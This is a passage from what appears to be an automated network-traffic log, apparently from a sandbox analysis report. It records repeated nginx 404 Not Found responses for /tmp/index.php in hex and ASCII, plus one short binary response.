                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 00:52:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the 